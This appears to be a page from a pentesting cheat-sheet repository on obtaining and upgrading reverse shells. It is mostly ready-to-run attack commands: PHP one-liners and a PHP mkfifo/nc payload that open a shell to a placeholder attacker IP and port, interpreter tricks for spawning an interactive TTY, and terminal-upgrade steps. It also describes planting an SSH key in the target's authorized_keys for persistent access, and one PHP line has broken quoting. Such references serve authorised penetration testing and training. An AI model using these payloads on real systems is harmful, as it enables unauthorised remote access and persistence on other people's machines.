whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Reverse Shells/Upgrade Shell.md

1.1 KiB
Raw Blame History

Upgrade Reverse Shell

Via interpreter

PHP

  • reverse shell
php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r 'exec ("/bin/bash")";'
  • Sometimes even
php -e 'exec "/bin/bash";'

Python

python -c 'import pty; pty.spawn("/bin/bash")'

Perl

perl -e 'exec "/bin/sh";'

Script

/usr/bin/script -qc /bin/bash /dev/null

or

script /dev/null -c bash

Next

  1. ctrl + z
  2. stty echo -raw
  3. fg
  4. export SHELL=bash
  5. export TERM=xterm

Via SSH

  • ssh-keygen
  • copy priv key and chmod 600
  • cat id_rsa.pub > authorized_keys on target

As Code

PHP

<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP> <attacker-PORT> > /tmp/f') ?>